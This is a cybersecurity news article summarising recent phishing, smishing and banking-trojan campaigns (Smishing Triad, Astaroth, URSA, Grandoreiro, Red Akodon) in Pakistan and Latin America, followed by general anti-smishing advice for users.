Grandoreiro Banking Trojan Hits Brazil as Smishing Scams Surge in Pakistan

Pakistan has recently become the latest target of the Smishing Triad, a cyber threat actor, marking its first expansion beyond the E.U., Saudi Arabia, the U.A.E., and the U.S. According to a report by Resecurity, published earlier this week, the group’s latest tactic involves sending malicious messages that appear to be from Pakistan Post to customers of mobile carriers via iMessage and SMS. These messages aim to steal personal and financial information. The threat actors, believed to be Chinese-speaking, utilize stolen databases available on the dark web to send these fraudulent SMS messages. They entice recipients by claiming there is a failed package delivery and prompting them to click on a link to update their address. This deceptive strategy is designed to trick individuals into revealing sensitive information, which can then be exploited for malicious purposes. The Smishing Triad’s expansion to Pakistan highlights the increasing sophistication and global reach of cybercriminals. By using legitimate communication channels, such as postal services, the group seeks to gain the trust of unsuspecting victims. The stolen personal and financial data can result in significant financial loss and privacy breaches for those affected. This development underscores the critical need for vigilance, cybersecurity awareness among users, and robust security measures by organizations to guard against such threats.

ATTACK OVERVIEW:

Users who click on the URLs are redirected to fake websites that ask for their financial information under the guise of a service fee for redelivery. Resecurity reported that besides Pakistan Post, the Smishing Triad was also detected orchestrating multiple fake delivery package scams. These scams primarily targeted individuals expecting legitimate packages from reputable courier services like TCS, Leopard, and FedEx. Meanwhile, Google has disclosed details about another threat actor, dubbed PINEAPPLE, which uses tax and finance-themed lures in spam messages to target Brazilian users. These messages entice users to open malicious links or files, leading to the deployment of the Astaroth (also known as Guildma) information-stealing malware. According to Google’s Mandiant and Threat Analysis Group (TAG), PINEAPPLE often exploits legitimate cloud services to distribute malware to users in Brazil. The group has experimented with various cloud platforms, including Google Cloud, Amazon AWS, Microsoft Azure, among others. This underscores the increasing sophistication of cyber threats and the widespread exploitation of trusted services to deceive users and propagate malware. The use of fake delivery notifications and finance-themed lures demonstrates the diverse tactics employed by these threat actors to obtain sensitive information and compromise user security. As these cyber threats evolve, it is crucial for users to remain vigilant and for organizations to implement robust cybersecurity measures to protect against such malicious activities.

ASTAROTH MALWARE:

Astaroth is known as an information stealer. It transfers the confidential, sensitive and important information from an affected victim like account id and password, keystrokes, and other data to the attacker. It is used to infect the memory of computers. It also exploits crucial binaries such as the command line interface of the Windows Management Instrumentation Command line tool to Download and execute malware payloads in the background silently. It’s worth noting that the abuse of Google Cloud Run to disseminate Astaroth was flagged by Cisco Talos earlier this February, describing it as a high-volume malware distribution campaign targeting users across Latin America (LATAM) and Europe. The internet goliath said it also observed a Brazil-based threat cluster it tracks as UNC5176 targeting financial services, healthcare, retail, and hospitality sectors with a backdoor codenamed URSA that can siphon login credentials for various banks, cryptocurrency websites, and email clients. The attacks leverage emails and malvertising campaigns as distribution vectors for a ZIP file containing an HTML Application (HTA) file that, when opened, drops a Visual Basic Script (VBS) responsible for contacting a remote server and fetching a second-stage VBS file. The downloaded VBS file subsequently proceeds to carry out a series of anti-sandbox and anti-VM checks, after which it initiates communications with a command-and-control (C2) server to retrieve and execute the URSA payload.

GRANDOREIRO BANKING TROJAN:

Grandoreiro malware is introduced through phishing emails impersonating recognized organizations such as courts or telecom and energy companies. Once in, the malware tracks keyboard inputs, simulates mouse activity, shares screens, and displays deceptive pop-ups, collecting data such as usernames, operating system information, device runtime and most importantly, bank identifiers. With full control over victims’ bank accounts, criminals empty them, sending funds through a money mule network to launder the illicit proceeds before transferring the funds to Brazil. The organization behind the malware is thought to have defrauded victims of more than EUR 3.5 million, however, according to CaixaBank several failed attempts could have yielded more than EUR 110 million for the criminal organization. A third Latin America-based financially motivated actor spotlighted by Google is FLUXROOT, which is linked to the distribution of the Grandoreiro banking Trojan. The company said it took down phishing pages hosted by the adversary in 2023 on Google Cloud that posed as Mercado Pago with the goal of stealing users’ credentials and personal information. “More recently, FLUXROOT has continued distribution of Grandoreiro, using cloud services such as Azure and Dropbox to serve the malware,” it said. The disclosure follows the emergence of a new threat actor dubbed Red Akodon that has been spotted propagating various remote access trojans like AsyncRAT, Quasar RAT, Remcos RAT, and XWorm through phishing messages that are designed to harvest bank account details, email accounts, and other credentials.

TARGET OF THE CAMPAIGN:

Targets of the campaign, which has been ongoing since April 2024 in Columbia, include:

  • Government organizations
  • Health organizations
  • Education organizations as well as financial, manufacturing, food, services, and transportation industries.

“Red Akodon’s initial access vector occurs mainly using phishing emails, which are used as a pretext for alleged lawsuits and judicial summonses, apparently coming from Colombian institutions such as the Fiscalía General de la Nación and Juzgado 06 civil del circuito de Bogotá,” Mexican cybersecurity firm Scitum said.

REMEDIATION STEPS:

  1. Do not respond: Even prompts to reply like texting “STOP” to unsubscribe can be a trick to identify active phone numbers. Attackers depend on your curiosity or anxiety over the situation at hand, but you can refuse to engage or interact.
  2. Slow down if a message is urgent: You should approach urgent account updates and limited time offers as caution signs of possible Smishing. Remain cautious, alert and proceed carefully.
  3. Check the phone number:Odd-looking phone numbers, such as 4-digit ones, can be evidence of email-to-text services. This is one of many tactics a scammer can use to mask their true phone number.
  4. Avoid using any links or contact info in the message:Avoid using links or contact info in messages that make you uncomfortable. Go directly to official contact channels when you can.
  5. Do not click on videos on suspicious websites: These videos can contain potential threat and may be referring to crisis like COVID-19.This can stop your computer from any risk of Trojans or Malware.
  6. Do not trust or download the attachments and URL’s sent by an unknown user: An unknown user who maybe an attacker or a potential threat actor may write an email subject titled as “URGENT. Do it now!” It implies there is something suspicious about that email. So, do not open the email if a user is properly sure whether it is a proper legitimate mail or not. When in doubt, contact the supposed sender through a different channel and confirm whether it is legitimate.
  7. Keep all software systems up to date and install required patches: Doing this, will help in keeping the user’s PC properly tuned up and up-to-date and also will be effective in dealing with any threat of Malware or Trojans.